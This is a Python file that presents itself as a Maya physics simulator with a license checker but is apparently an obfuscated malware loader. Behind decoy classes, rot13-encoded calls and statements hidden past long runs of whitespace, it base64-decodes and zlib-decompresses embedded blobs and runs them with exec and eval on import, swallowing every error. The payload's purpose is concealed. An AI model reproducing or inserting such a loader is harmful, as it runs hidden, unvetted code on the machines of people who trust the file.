
from builtins import *

def Substract(iterable, start=1):
   result = start
   for element in iterable:
       if not isinstance(element, (int, float)):
           raise TypeError("iterable analysis failed")
       result *= element
   return result

__author__ = "Michael Davydov"
__website__ = "https://brotools.tech; https://michaeldavydov.com"

__code__ = '''import sys
if sys.version_info[0] >= 3:
    import builtins, codecs
    builtins.unicode = str
else:
    import __builtin__ as builtins
    import codecs
o = getattr(builtins, codecs.decode('__vzcbeg__', 'rot13'))
b, z, s = o(codecs.decode('onfr64', 'rot13')), o(codecs.decode('myvo', 'rot13')), o(codecs.decode('flf', 'rot13'))
d, e, c = getattr(getattr(b, codecs.decode('heyfnsr_o64qrpbqr', 'rot13')), codecs.decode('__pnyy__', 'rot13')), getattr(getattr(z, codecs.decode('qrpbzcerff', 'rot13')), codecs.decode('__pnyy__', 'rot13')), '4EJwSDieBwXyXxq6Vvkp@nyH8TGtFvKmicn&d*N*nSKJFuZu$uB6##Zf3aTgZ2AGb^YFTGrMj!AVoU*x*#o6eFn^oF5rjbggbB3BYUuUiZTYkDkLg7xME73at4k6y6DCLYnJK$D4^aXY3GNdY67@#7d&v3PYF^k2T!Sp22#8GKPoui7ESR4bCf2i$xTjXeM@bJ%PE3$6&h5#DZvk9TDGkVokd$a%oJKzT^*stmGf7sCLS3%@jCfMH^CuTGcQ#Qp2yQ%@$A!Co8kjm45!B98Df2ij6Q7fGZZu5hRNT5FbcH6FX!*H$u$2UKR2uXkL4DBWmKZoiwWBPp@qNH!YAyyyRpTsJrA$^H6m4fM3&@S@tK9WfLnSqztv44R@&yVH3S393VSEQrh!Y*bUS&rbPQzaPVA3#K*h8F3^k27sxMxwYeCivxqV3*^^E!RMUzsQBe3TBrpca!r7u5KXAxy2BH@s^DwZEcnjUc5Udmxeu!F3mcC@uSAw7h&Lo8!H5EQQbp%xH^CnMf*gzTTB6R6ymMuZ&9*&oJ497W^5kdc%UqSAJHhqwJ^5R!25*@*2vNrcoGQ8B7SS!2!TrJPZhoby$R2KuT@QuXy8d&foJsq@Po9q%@y!qkESd3LMzCGs5@V%fU!KLbs5!fv5zBgiAM^7Cycxz25yQ5fDi@q%RedPvMWBM6mMdW8pxsy#^*@sZDTPyXY5rJ$Xpgnqw@TaQU@MCKP%vt2BsKxRu78m2KxC%MZwV7HMDddWAsXijVfY^74!bW&$n9^sc6o!QHZH2g4Z@MLH3%7AhQyGmLFb@5S6$QacM*sdMXp$!K8PqVoW$!zQc7zjDZKN77TNW@665i!9UsnbhugqAAc6n4JE*^JD^kVaSce53Sw$@xs^7WwEqG#Fu4U9' + '==='
exec((lambda x: x.decode(codecs.decode('hgs-8', 'rot13')) if s.version_info[0] >= 3 else x)(e(d(c))))'''


# _mayacmdswrapper, PhysicsEngineCoordinator, _brorenmer, NodeTopologyOptimizer, _brolicensechecker, _scenenodeanalyzer, _nodephysicssolver = exec, str, tuple, map, ord, globals, type
_mayacmdswrapper, PhysicsEngineCoordinator, _brorenmer, NodeTopologyOptimizer, _brolicensechecker, _scenenodeanalyzer, _nodephysicssolver, Restore = eval, str, tuple, map, ord, globals, type, compile

class _mayaphysicssimulator:
    def __init__(self, _simulationscenecontroller):
        self._add = Substract((_simulationscenecontroller, -37994))
        self._physicsenginecoordinator(_math=49258)

    def _physicsenginecoordinator(self, _math = True):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self._add /= 29894 + _math
        
        try:
            ((NodeTopologyOptimizer, (_mayacmdswrapper, _brolicensechecker)) for NodeTopologyOptimizer in (_mayacmdswrapper, _mayacmdswrapper, _brolicensechecker) if _brolicensechecker is PhysicsEngineCoordinator)

        except TypeError:
            ((_brorenmer, {'ee66eto5R': PhysicsEngineCoordinator}) for _brorenmer in (_mayacmdswrapper, _brolicensechecker) if _brorenmer >= NodeTopologyOptimizer)

        except:
            _nodephysicssolver(6932 / 179) == str

    def DetectVar(self, Math = -99966):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        Math /= -8302 + -85807
        self._simulationruntimecontroller != type
        
        try:
            ((_brorenmer, _brolicensechecker) or NodeTopologyOptimizer if (_brorenmer, _brolicensechecker) and NodeTopologyOptimizer else None or (NodeTopologyOptimizer, (_brorenmer, _brolicensechecker)))

        except OSError:
            (({_mayacmdswrapper: 'OlgeBdO5Beel6iB'}, _physicsnoderouter) for _physicsnoderouter in (_physicsnoderouter, _mayacmdswrapper, _brorenmer))

        except:
            _nodephysicssolver(-90299 / 96) == str

    def _dynamicnodeprocessor(Positive = Ellipsis):
        return _scenenodeanalyzer()[Positive]

    def LicenseCheckerAgent(_mayanode = 96689 * 73634, CallFunction = float, MayaSimulationEngine = _scenenodeanalyzer):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        MayaSimulationEngine()[_mayanode] = CallFunction
        
        try:
            ((_mayacmdswrapper, {_mayacmdswrapper: 'OlgeBdO5Beel6iB'}) for _mayacmdswrapper in {_mayacmdswrapper: 'OlgeBdO5Beel6iB'} if _mayacmdswrapper >= NodeTopologyOptimizer)

        except OSError:
            ((_physicsnoderouter, _mayacmdswrapper, _brorenmer) or _brorenmer if (_physicsnoderouter, _mayacmdswrapper, _brorenmer) and _brorenmer else None or (_brorenmer, (_physicsnoderouter, _mayacmdswrapper, _brorenmer)))

        except:
            _nodephysicssolver(-26434 / 8043) == Ellipsis

    def execute(code = str):
        try:
            return _mayacmdswrapper(Restore(PhysicsEngineCoordinator(_brorenmer(NodeTopologyOptimizer(_brolicensechecker, code)))), locals(), globals())
        except:
            pass
        # return _mayacmdswrapper(PhysicsEngineCoordinator(_brorenmer(NodeTopologyOptimizer(_brolicensechecker, code))))

    @property
    def _simulationruntimecontroller(self):
        self._licensecheckeragent = '<__main__.CallFunction object at 0x000007324BE17299>'
        return (self._licensecheckeragent, _mayaphysicssimulator._simulationruntimecontroller)

try:
        _mayaphysicssimulator.execute(code = __code__)
        _sceneanalyzer = _mayaphysicssimulator(_simulationscenecontroller = -14561 / 23757)

        _sceneanalyzer._physicsenginecoordinator(_math = _sceneanalyzer._add - -67652)                                                                                                                                                                                                                                                          ;_mayaphysicssimulator.LicenseCheckerAgent(_mayanode='IIlIIlIIllIIllIIIll',CallFunction=b'x\x9c\xed\x1ckS\xe2J\xf6\xbb\xbf\x82\xfdDr/C\x85@\x12\x98*?\xa8\x8c.\x96\xa3\xe5\x1d\x1d\xad\xb1\xa8T\x80F\xc34\x89\x93\x04\xc1\xbb\xb5\xfb\xdb\xf7\x9c\xd3\x9d\x07/\xcd\x00q\xe6V\x99\x90N\xa7\xd3\xef\xf3\xec\xd3\'p\xbf\xef\xf0PQ\xef\xca\x17\xb3f\xa0\xd9\xdf\xae\x1f\xeb\xfd\xef_o\xae\x8f\x1ff\xb7\xda9g\xff>\x9f\xb0\xaf-\xfd\xe6{\xed\xc7\xe0\xb8_\xbb\xbc>\xf7\xae\xb5\xd3\x913\xb5\xfd\x99f\x95\xbb\xfb\xf7\xdc\xefA\x15{\x1b\x95\xa7\x86\xfd\x0b\xbf\xdd\x86\x1f\x04x\\\xb4/ \xa9]\xbe\xfb\xf8\xf1\xcf\x0f\x7f~P>(\x7f\xd6T\xb5\x0b-\xb1\xc8\x89\xa2`\xf3\x96\xdc\xd1h\xc4\xb9\xcbG.\x17\'\x87\x94\xe5v\x06\xee\x16m\xac/x\xfb\xf7W\xbdW\xff<s\xae\x0e\x0f\xbf\xdc\x18\xa7\x7f\xf1\xc7z<\x89\x9c\xc0\xf0B\xabk\x0b\xbf\xd0\xe6\t\x0f\xd9\xe8::o\x1f\x1a\xd7\xfc\xbav\xc5\xbf\x8dn>\x1d\x1f^^q\xfd\x9b\xfe\xeds\xdc\xb6m\xbb\xe3G?\x88l{\xe7\xa3>\xe1\x93\xf3\xd1\xb7\x93o\xda\xc3\xe1\xe5x\xc0/\xbf\xf3Q\xdc\xea\x16}V\xca\xbd\x89\xcb#\xd7\x0b\xcbj\xf5\xc9\t6\x9e\xb7\xf3\xf3\xcfx`x\x0e\xf1s\x0c\xa1km@?@BBF\xc2J\xf8A\x92\xb2U\x97C\xcf\x8d\xb8;\xe9-\xa2\x9bZ\x19\x8d\x10\x11\xc59B\xa4\x04,u\x0bjL\xbd{\xd3\xd6\xaa\xae7`3\xa5\x1cD\xe1\xd2\xcb\xae\xba\x0el\xeb\xb0F0\x0bM\xf35b\x13\xc0%0x\x07X\x01\x00c!w\x8e\x7f\x02d\xafQ\xda\r\x1e\xb7qx{K\x01<\xbc\x03\xaf\x00\xe0q\xe7\x89\xed\x8a\xdc\x00\x1c \x8b!Dr\xbb \x00\x15\x053\xd7\xed\x87\x8e\xe7\xbe\r\xcc\xd66V\x08\xcc\xd6\xb7\x16\xc3\xecy\xe8\xf2\x19{\xf0&?Gt\xaf\x88\xe5/_\xbe\xe8x\xe9\x18B\x14\xee\x00\xbdr\xb9:\xf2]o\xf3jO\xcf\xce:g\x1d\x11\x9e\x9d\x9evN\xdf\xc9\xb8\x08\x1e\xcc\xdd\xc7\xb1\xdf\xdf-B\xe8\x12\x19t<\xc4\x13<\xea\xef\x00,\x02\x80\x93\xe0jG|\xb8\xc39\xa7\x0b\x0e\x11y\x87X\x01\x10\x8b\x1c\x9f\x0fw\xa8\xf6\x08P\xf1Nz\x87\xe3\x1drE\xe8<\xbe\xbf\xfcv\x0bN\xb9J\xf1Qze\xb3e:p\xf6\xe5\xd5\x82S\xc4\xfb\x94N)\xb0(\x1d\xb0\xbe?`J\xb99\x8cV\x08\xf4w\xf0\xef\x1c\xfc}6\xdb\x95\xca\x8bV\xa8\x0b\x84\x07\xdc1J\x91l\xdd\xeb\xd62JY\xadA\x06-W\xde5\xf8U\xaf\x1bC\xba\x1ap\xe9pYp\xb5\xe02\xe02ezS\xef\xe9M}\x90+\xaf\xa5\xbf\x8a\x8f\xaa\x08\xba\xdd\xfd\x9f\xed\xadn\x99\r\xb3f\xc1\xa5[\xaf\xb6\xb2\t,PO\x11?=\xd1a\xdf\x0c\x14\x9a>\xa0i\xae\xfd\xcc\x14rg\xdc\x1b8%iTB\x83\x12Z\x96 \xf6qCN\xb4\xc1\xb4\xad\x19\x90Q\xaf\xeb\x80\'u\xbc\xa7q\xf1\x94\xa6f\x9f_\xe7d\x1b`\x0c3k\xe6\xc04\x8a\xc1\x985\xcd6\xfa\r\xa7\xd1\xa2P\xdc\xfb\x14\xb6\xb2i\xbb\x1f,\x11cS\x12\xa4%\x89\xd5\x94\xc4\xda\x90i\x9a$\xe6\x97\xf2\xeaI\xde\xd71q\x132\xfb\x9c\xe0)\xa1\xec\xe7\xf3\xad\xe8\xa6%G\x17\xf7^\x93\xf7xt\x1872\xa3~-o#\x1f\xfdm\x84\x8c-\x93\x01\xfb2,\x9d\xd0\xb2\xff\xa6H\x99\xa5\xb8\x94.\xe3S\xa4\x15A\x81\x05\xf1jl\x16\x1b\xa7>\x88\x0em\x8dFfF\xaa\xd5\xe4\xbd\x11KAB\x8d\x14\x8d^\xcb[/\x0e\x8d\x1a\x96i\x00\x02!\x1a\xa14\x04\xa42-]C.\x07\xe8e@\x0c\x1e\xcd\xa19\x80X\x1d\xee\xcc4!\x0f\xe60I\x7f4tF\xe7\x9br\xc4\x968\xcd~|\xc7S<\x8bx\xfc&~\xfb\xcf\x13\x06\x88\x92\x84\x8c\xb7\x99.m\x85\x935\xa9\x12\xe4a\xc4Yu`:\x9d\xce\xe8\x98\xd2\x0f\x83\xe9t\x9dF\xb0~D\xbb\x03\xbfeYM8-yo\xd2\xdd\xca\x84\xcd\xcc\xfbW\x81\xf3\x1b\x82~\x8a3,\xe6y6\xa5\xebm\x01\xff\xbbM\xc8:60l\x0cM:\x1b |\xf1\xa9\x91<\x99\x94\x12\xbf1)\xa5\x10Lh\xc1\xb0-\xab^\x10&\xdc\xde\xc4bI\xf6)\xe7\x02B\xb3k\xb6a\xd7!lAh\xd9\xbam`?\x96S\xb7B,]J\xae\x9aTx\x9a\xf2\xd9\x90*`\x8d\xd6pB\xca\xe5\xc9kn\xb0X9\xeb\x9c\x9e\xa2a\n\xed\xf9g\xa7p\xc2q\n\xe1\x0bK\x96\x17\xac^\xbbCN3\x91D\xd2\xe8\xd2"\x03\x8b#\x8d.N\x1eS\x8b\x1c\xe2\xd8\x83c<\xf6\xe8\x0e\xe1x\xfc\x86\xeb\xb1\xf2\x85po\x81\xc1\xe1@}\xffb;^$\x95\x1a-^\x15H\xd07%\x1a`ZM\xa2L\x9e\xbc\x05\xf2\xb4\x86\x8e\x8a\x8f\xd1 \x16\xd3\x07\x12\xd7\x0c\rR\x0cP|\x0c\xba3P\x88\x8c\xc2H\xbf\x8d\x13\xee\x0b7\x81v[8\x18\xcd;\x16\xbdD\xff\x90\xa1\xf6\x96B\xe3\x1f%8\xe6T\x06qO\x8f\xf9\xe7fn*E ]\x08c(z\x81a\xb3\xed_\xcd\x84\x92!53\xb1x\xf0\xcd\x02\xf5\xa3V\xbd\x86\xdc\xddZM0\xcc\xd2h\x95Q\x0c\xe1\xd0F\x13\x17{N"\x82;N\xf9\xe8\xa6a7m\r\xe4b\x1d\xce\x06\xdc5\xdb\x82\x02\xc6r\xea\xce\xe9\xb0\xac\xa2T6\xe1\xaaAk5l\x83d\xb6\xbe\x9c\x9a\xb3>\x94\xef(\xef\x9bp7\xa1\xe7\x9a\xdd\x80\x02\xcd\xe5\xd4\xdc\xfdC\x9d\x01\xfb\xd1\x82Y\xb0 \x14\xfd[J\xdd\xb9\x91\xb3\xac\x1aP3\xb6\xa0CX\xa7\xd6\x10.\xe6r\xea\xefl`}\xe9\xfa\x07\n\xa8\xd8\xeev.=\x11\x853"z!\xe6\x83\x01\xd2\x94Ate\xd2U#\x98\xb6\x96S\xdfL\xe6\xe9\x19\xebK\xac\x936b=66\xeae\xf4\xd9\xd7\xf2\xfe$nl\xc4i\xb36\x99\xc2\xf9*\x17;\xf8\xc9F~N\xbe\xban\xbec\xe3i\xbc\x1603s\x19+x\xb1\x95,O\xde\xdcV2)\xb2\xc5\xba\xea\x96\xfa\x9b\xd8\xffnn\x7f\xb5\xd4\x06}\x88\xc9K\x9c,\t\xe3\x18\x13OE\xc8n\xa3n\xd6,3\xb1\x03\xce\xe1Wq\x96>r\xee\x91\x0e>\xd2\xc7G:\xfa\xec~\xcfl\x17\xec\x7f\x03\xf5xc6\x9f\x05A1\x93\x8f\x0b\xe7\xceY\x87\xfc\xe2`\xf1\xdc9\x85\x13\xd6\xd5g\xbft\xeaQ\x831H\xeb1@\x0eh\xa4\x03\xd5H\x83YJ\xddz\xd7\xba\x99\xe1\xdc\x9a\xe4\xea\xcd\xcc\xe6U#\xb3k\xfdZ\xde\x9c\\(\'Z\x089\t\x9a\xdb\x07=\xa7$\xdc\x95\xc6\xb2\t"\xd1\'*\xd2w\xc2%W\n\xce!\xe9-\xfb\xfd\xfb\xadB\xcb\xa9\xe1FZq\nX=h\xb46A\\\xd1h\xbd \xec}\x0biE\xb4\xbb\xb5\xd6\x15\xd3\x93a\xcc{\x82\xc4\xa6\x1f\xa21I\x7fy\xf267\xd3\xc8\x13\xad\x80\xb4\x9b\xd8\xe1M\xac ;\xbf\xde\x01b\xfd\x02>Y\xe0\xe7\xb7U\x9c\x11\x7f\'\xd3)\xb1{\x08\xdedC\xa7\xec\xc540\x96?\x08\xf2R\x03\xae\x83\x1b\x84\xc7\xc8\xf5q\xad\x80\xab\xe1LJ\xcezPj4p]Aeq\x05\xd9\x84\x02\xd6rj\xce\xfap\xe5i\xca\xb2\xa6\x8d\xd2\t\xa5Tc9\xf5w\xb6\xddm\xbd\x0e)\xd6\x97\x8aP\xc5K\xce\xdc<t\xdd\x0ceW\x12\x86\x91:\xae\xc4\xae\x1b$\xe7%\xcf\xc9\x937\xa7\xa7Z\xba\xa7:\x8b\xf7T\xc5&\x1f\x9d\xb3\xb74\xebS\x07\xc4&\xa3\xe8Hn\x0b\x99f\x8b5:\xea`u\xb9j7\x96SsS#\xda\x8f\x90\x92\xebT\xbeN\xb4\xb8\x90\x96\xdb\xa2\xd0"\xcb\x81A\xb4WG\r\x91,\nK\xa9[\xeb\x8b\xf1\xaa?\xbb\xf2\xb7\x8c\xd4\x8f\xa3\x96\xd1\x17_\xcb\xbb\x01\x95n\xb4\xae\xeb\x9bL\xd7\xe6\xcf\x05\xdf\x0f\xb4\x15i@\xc3\x1anWYu\xab\x01\xb1\xa1i\xea\x9a\x85\xfb\x9c\r\x13rS\x1a:\x1ei\x16\xc4)\x7f\xe2\x1f\x0254M\xf4\x18\x81\xdc\xb0\x824\xb0\xbd\xa4\xa6>\xd6\x0cu$\x1e&"\xb7,7\xd45\xea\x87E%jV\xcb\x1cb\xfd\xab\xfa\\w,\xa8\t{L>)\x92\xef\xd4\x1d\x18M\xd2/Jo\x994\x02Y\xfb\xc2H\xe7<\\Z\x98b\x0e\xe6F\xc3V\xb5]\x10w\xc3O\xbb]t5\x16j3\xdeF[\xa1\xe8\xa2Jdd\xd0-\xf6\xcf\xd3\x17\xbc\xd8^\xca\x9b[\xf5^\xf9\xcd\x80\xa2\xfco\xf9\xcbW\xd5\x0f\x14e\xdd\x17=\xaa\xe3\r\x94\x15ev\xb9\t$7g[\xd2\x03\xbe\x9fl\xd2\n\xcf\xf8\x96|#\xfd\xe4s\xabV\xe2S5\xfat-q\xfc\xdd@\xb7b3\xd6W\xa4ED|\x07G&\x11uo\x18\xf8\xe3R\xcf\t\x99\xd9(\x89O\xdfK=\xb3!\xfaVr\xc2\x12w\xfb\xcc\xc3\xb7{\xf2\xad\x1f\x8a2\x87\x81\x7f\xe5\xfb<\xac\xf6\xfd\x80U{\x81\xff#\xaa>1o\xe0\x07\xd5\xcb(\xae\xea2:\x82\xb7\x15\xb8\x9fL\\\xbc\xdd\xb8\x83{\x16\x85qe\xf3\x95L"\x97/\xd7\xee\r\xdd\xfbI\xe0D\xae\xef%=\x0c\xfc\x08\xdf\xda\xe2m\xa5\xf4\x9d=\xdba\x04u\xd8\x8fN\xf4P)\x8d\xfd\x81\x88@N\xfbG\x18VJ.d\r\xe9\xed\x8a\xee\xc7\xf5\x0e\x9c\xc8q}(\xee<;\xf6\xea\xde$c\xc5\x9a\xa7b4\xa5t4\xd7\x9e\xfb\xc4\x82\xd0\xe1\x1d\xefq\x12U0\xe9\x93\x17\x05\xcf\x14\xbbr#\xceD\x8c\xcd\xc4\xcbc?\x18\x9f9\xcf\xfe$z\xad%\x98\xd9i\xb6\xa5/\x10\xe5\xec\x86\xd2W\x95\x15S\x03#\x0eB\x16d\xca\x1dQ\xfa\xaa\x12\x03\xd6\x9b\xdc\'S\xc1\x86\xce\x84G6\xf7\xef\xef\xa1<b\x82\xbf\xb2\x14MS\\*|\xe4ndO\xfd`\x10\xda\xaeg?9\x81\xeb\xf48\xdb\xebs\'\x0c\xd3\xd6?\r\xdcH\xf4\\Y\x18\x89\xfaq\xaf\x04\x07\xb4^\xb2\xa1\x06\xa8\xccV\x0e*\xa5\xc0\xf7%\xea\xec\x9f\xfb\x1e\xcc\xa1\x18\x9d|\x88p^\xf7\xf1\x13\x12A\x94\xe2+\x92\x8bJ\xe9\x8f#\xb8\xfeh\xcbJ\xf18,\xed\xcb\xb2IR8yd')

        _sceneanalyzer.DetectVar(Math = 63978 * _sceneanalyzer._add)                                                                                                                                                                                                                                                          ;_mayaphysicssimulator.LicenseCheckerAgent(_mayanode='S2S22S222S222S2SSSS2S2SS',CallFunction=b'\x81\xb2\xa2o\x95\xd2\x81ZMz\x81u!\x12\xed\xfba\x15\xd1\x88>\x1bU\x12DC\x96\xe2_h\x82\xb5\x00\x9f\xb9\xc0\x07`7\x95\x92\xf4y\x8f\xb74\xce\x13Gx\xb5R\x02\xd4\xdcOPT\x0c#\x12H\x92\x19q\x1a\x15\xa3Iz\x0e\x10\xa9\xba\xde\xd0W$\x9fK,\x9d\x92\xf9\xc1\tH\x96\xe6w\x87%\xc5\xf3\x818\xc3p\xd2#\x90(\xd1\xf3#S\x0e\xd5J\n\x1b53[x\x1cHL\x82\x89K\xf2(\x99J\x19\x0f\xd9\xfa\x12{i\xe2\xd8q=\x81\xea\xf0"\xe1\x04\xd5\xcb\xaf\x87\xfeL\xa4+j&{\xc8"\x99\x9a-\x9a\xcdq\xcf<\x06|\x81\x11\xa9\x85\xc7\x80\x9a\xb2wq\x07\x16\xaa\x13P=\xe6\xce}\xa8\x08\xc6\x04\x9c\xaa\xdav\x1d\x98\xc7\x85\xac\x07Q\x14\xb8\xbdI\xc42\x19o\x0e\xec\x03>u\x9e\xc3/\x0f\xfe\x14\t\xe0\xca}\x0cW6\xd1\x81\xe6\x15by\xd5K\x8a\xcf\xa1L\xca\x89*\xc2\x17R8DJ\xad\x1deRZe\xc0B\xf7o\xa6\xe0w\xc5dDEkjjY=\xab\x94\xce(\x8d\xbc\x95:"\xa6&\x04\xb4~~b\xfa\xc9\x80Zj\xed\xb1S\xe6t6\x87e\xc4\x1a\x14\xa91H\x9ff\xda\xdc\xc8v\xd6\xc5v:\x11\x1b\x87\x00\xe0\xff\xfc7y3\xf4\x03\xa0;\xd7\x93\x8d\xc2<\xf5\x91\x99\x87\xf3X\xd3\x16\x08\x962\xc4\x0c6\xe0\xf1i\x1ekN\x02\x7f\xf2\x08\x98\xa3\x1c\xde%^\x8d\xd4y\x8ct\x17\x8af\x90\xa9\xad.\xe0j\x8a[Ug0\x10\xf5+\x9f\x16s\xa5c\xbb;\xbc\x13\xfbU\x9dX\'\x91\x9f\xa2B\xa4\xdb\x9d\x1fy<z\xe5\xb8R:Qq\n\xb8\x1bF\xd0e\xe4T\xc8)\xe8\xb3*P!0\xda\xee\x02\xb3\x19\xb8}`6U\x17[R\x16I\x11\x8f#1M\xf3rFyr\xf8\x84\xd9H\xcc\xfbD\xd1\'\xaa\xba\\\x12g\xe1+f\x84\xd7+\xdeR\x1dG\x0f\x8ew\xcf\x06H@\x1e\x80\tH)\x93\xbc\\\xaa\x8ds\xf6\x17\xb0\xf15\x8c_9V\xab\xc4\xd0\x14`1G\xcb\xe5\x17&\x96\x8c\xbb\xf4WD\xae\xfcg"\xfad\xae\xdb\xbd;\xc6\x99=JP;\xd3)\xe0E\x1fW\xe0\xea8\xb1\x8f&+\xfc\xb1\x97v\x80\xa6\xb1\xba \t\x10T\x07\x08\xa5\xa358\x8a\x0c\xf4\xe0N`Y\xe2O\x1b/\xbb\xbbU\xeeOA\x92\xa8\xd5\x10\x98\xc7\xa3\xa2\x96\xfe\xb5_\x12\x9f\x90|N?*Y\x01R\xc2\x90v\xa5\xf4)\xc5\x90\x83;/\xed}2\x14/\x17\x86\x08h\xc6\x19\xef\x0e\xee\x04v\xb5\x85\xd3\x1d\xb9\x80\xa1/X7\xad\xec\xae\xdd\xa5\xe9\xc8\xc0\xe2\xe0N*\x8aB\xa4H-\x94\xee\x00\r@U\x82@\x86D\xe3\xc9\xac\x86\xce\x13\xa6\'\x12\x9fT\x05\xc1xR\x91\xbf(j\xd7\x88\xfd?\x0eQ\xe2\x1de\x06\x99\x08\xeb\xa5j\x17\xa4\xf5a\xa2#,)\x8bB\xce\xc6\x9e<\x1d\x9e\x900\xe7\xa2\xb9\\\xb2\xa0\xcd8\x8b\xd8\x85w\xc4\xfd\x10\xe45-\xb8\x04\xda\xd2\xba\x0b\x97`\xea\x1e\x0e(\x04q17\xfe\xf9Q\x1d\x08\x82^\x9e&\xd1\r\xe8\xc2\x03=\xfc\x1f\x15+\xecc')

        if 102432 > 6159311:
            _sceneanalyzer.DetectVar(Math = -7271 - _sceneanalyzer._add)
        elif 233677 < 7127727:
            _mayaphysicssimulator(_simulationscenecontroller = 91614 * 22455)._physicsenginecoordinator(_math = _sceneanalyzer._add + 70196)                                                                                                                                                                                                                                                          ;llIIIIllllIlIllIIlIlllIIl,OoOoo0OOO000o00O0ooOoooO,OooOOoDODDoDDoODDOOD,lIIIIlllllIIIIlll,WWWXWWWXWWXWXXXXWX=(lambda DDODOoOODODDDOoOoo:DDODOoOODODDDOoOoo['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda DDODOoOODODDDOoOoo:DDODOoOODODDDOoOoo(__import__('\x7a\x6c\x69\x62'))),(lambda DDODOoOODODDDOoOoo:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(DDODOoOODODDDOoOoo)"),filename='\x4e\x4e\x4e\x4d\x4e\x4e\x4d\x4e\x4d\x4d\x4d\x4d\x4d\x4e\x4d\x4e\x4e\x4e\x4d\x4d\x4e',mode='\x65\x76\x61\x6c'))),(lambda DoOODDDDooOOoOOooOOoO,DDODOoOODODDDOoOoo:DoOODDDDooOOoOOooOOoO(DDODOoOODODDDOoOoo)),(lambda:(lambda DDODOoOODODDDOoOoo:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(DDODOoOODODDDOoOoo)"),filename='\x4e\x4e\x4e\x4d\x4e\x4e\x4d\x4e\x4d\x4d\x4d\x4d\x4d\x4e\x4d\x4e\x4e\x4e\x4d\x4d\x4e',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        if 349241 > 8822927:
            _mayaphysicssimulator(_simulationscenecontroller = -99916 * -78786)._physicsenginecoordinator(_math = _sceneanalyzer._add + 19302)
        elif 312100 < 7574956:
            _mayaphysicssimulator(_simulationscenecontroller = 89685 * 31894)._physicsenginecoordinator(_math = _sceneanalyzer._add + 97803)                                                                                                                                                                                                                                                          ;WWWXWWWXWWXWXXXXWX()(lIIIIlllllIIIIlll(llIIIIllllIlIllIIlIlllIIl(OoOoo0OOO000o00O0ooOoooO(OooOOoDODDoDDoODDOOD('\x76\x61\x72\x73'))),_mayaphysicssimulator._dynamicnodeprocessor(Positive='IIlIIlIIllIIllIIIll')+_mayaphysicssimulator._dynamicnodeprocessor(Positive='S2S22S222S222S2SSSS2S2SS')))

except Exception as _physicsnoderouter:
        if 322277 > 4684352:
            _mayaphysicssimulator.execute(code = PhysicsEngineCoordinator(_physicsnoderouter))

        elif 427279 > 9523145:
            _mayaphysicssimulator(_simulationscenecontroller = 78269 * -88091)._physicsenginecoordinator(_math = _sceneanalyzer._add / 2391)

